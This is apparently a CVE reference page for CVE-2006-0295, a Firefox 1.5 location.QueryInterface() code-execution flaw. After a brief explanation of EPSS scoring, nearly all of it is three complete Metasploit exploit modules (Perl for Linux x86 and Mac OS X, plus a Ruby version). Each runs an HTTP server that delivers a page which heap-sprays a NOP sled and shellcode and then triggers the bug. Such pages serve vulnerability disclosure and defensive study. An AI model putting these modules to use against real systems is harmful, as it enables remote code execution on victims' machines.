CVE-2006-0295 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::firefox_queryinterface_linux; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Firefox location.QueryInterface() Code Execution (Linux x86)', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on Gentoo Linux with the stock Firefox 1.5.0 package. }), 'Arch' => [ 'x86' ], 'OS' => [ 'linux' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'Keys' => ['-bind'], }, 'Refs' => [ ['CVE', '2006-0295'], ['BID', '16476'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Mozilla Firefox 1.5.0.0 on Linux x86' ] ], 'Keys' => [ 'mozilla' ], 'DisclosureDate' => 'Feb 02 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^\s+|\s+$//g; my ($var, $val) = split(/\:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $os = 'Unknown'; my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable'; $os = 'Linux' if $agent =~ /Linux/i; $os = 'Mac OS X' if $agent =~ /OS X/i; $os = 'Windows' if $agent =~ /Windows/i; $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); if ($os ne 'Linux') { $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); } else { $self->PrintLine("[*] Sending payload and waiting for execution..."); } my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); $fd->Close(); } sub JSUnescape { my $self = shift; my $data = shift; my $code = ''; # Encode the shellcode via %u sequences for JS's unescape() function my $idx = 0; while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); $code .= sprintf('%%u%.2x%.2x', $c2, $c1); $idx += 2; } return $code; } sub GenerateHTML { my $self = shift; my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); my $data = qq# <html> <head> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { h = FillHeap(); location.QueryInterface(eval("Components.interfaces.nsIClassInfo")); }; function FillHeap() { // Filler var m = ""; var h = ""; var a = 0; // Nop sled for(a=0; a<(1024*512); a++) m += unescape("\%u9090"); // Payload m += unescape("$shellcode"); // Repeat for(a=0; a<1024; a++) h += m; // Return return h; } </script> </head> <body onload="BodyOnLoad()"> </body> </html> #; return $data; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-02-07]

## # $Id: firefox_queryinterface.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox location.QueryInterface() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package. }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], 'Version' => '$Revision: 10394 $', 'References' => [ ['CVE', '2006-0295'], ['OSVDB', '22893'], ['BID', '16476'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], ], 'Payload' => { 'Space' => 1000 + (rand(256).to_i * 4), 'BadChars' => "\x00", }, 'Targets' => [ [ 'Firefox 1.5.0.0 Mac OS X', { 'Platform' => 'osx', 'Arch' => ARCH_PPC } ], [ 'Firefox 1.5.0.0 Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DisclosureDate' => 'Feb 02 2006' )) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) handler(cli) end def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) return <<-EOF <html> <head> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { h = FillHeap(); location.QueryInterface(eval("Components.interfaces.nsIClassInfo")); }; function FillHeap() { // Filler var m = ""; var h = ""; var a = 0; // Nop sled for(a=0; a<(1024*256); a++) m += unescape("#{enc_nops}"); // Payload m += unescape("#{enc_code}"); // Repeat for(a=0; a<1024; a++) h += m; // Return return h; } </script> </head> <body onload="BodyOnLoad()"> </body> </html> EOF end end

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::firefox_queryinterface_osx; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Firefox location.QueryInterface() Code Execution (Mac OS X)', 'Version' => '$Revision: 1.1 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package. }), 'Arch' => [ 'ppc' ], 'OS' => [ 'osx' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'Keys' => ['-bind'], }, 'Refs' => [ ['CVE', '2006-0295'], ['BID', '16476'], ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Mozilla Firefox 1.5.0.0 on Mac OS X' ] ], 'Keys' => [ 'mozilla' ], 'DisclosureDate' => 'Feb 02 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^\s+|\s+$//g; my ($var, $val) = split(/\:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $os = 'Unknown'; my $vl = ($agent =~ m/\/1\.5$/) ? 'Vulnerable' : 'Not Vulnerable'; $os = 'Linux' if $agent =~ /Linux/i; $os = 'Mac OS X' if $agent =~ /OS X/i; $os = 'Windows' if $agent =~ /Windows/i; $self->PrintLine("[*] Client connected from $rhost:$rport ($os/$vl)."); if ($os ne 'Mac OS X') { $self->PrintLine("[*] Invalid target for this exploit, trying anyways..."); } else { $self->PrintLine("[*] Sending payload and waiting for execution..."); } my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); $fd->Close(); } sub JSUnescapePPC { my $self = shift; my $data = shift; my $code = ''; # Encode the shellcode via %u sequences for JS's unescape() function my $idx = 0; while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); $code .= sprintf('%%u%.2x%.2x', $c1, $c2); $idx += 2; } return $code; } sub GenerateHTML { my $self = shift; my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->JSUnescapePPC($self->GetVar('EncodedPayload')->Payload); my $data = qq# <html> <head> <title>One second please...</title> <script language="javascript"> function BodyOnLoad() { h = FillHeap(); location.QueryInterface(eval("Components.interfaces.nsIClassInfo")); }; function FillHeap() { // Filler var m = ""; var h = ""; var a = 0; // Nop sled for(a=0; a<(1024*256); a++) m += unescape("\%u6060\%u6060"); // Payload m += unescape("$shellcode"); // Repeat for(a=0; a<1024; a++) h += m; // Return return h; } </script> </head> <body onload="BodyOnLoad()"> </body> </html> #; return $data; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: text/html\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-02-08]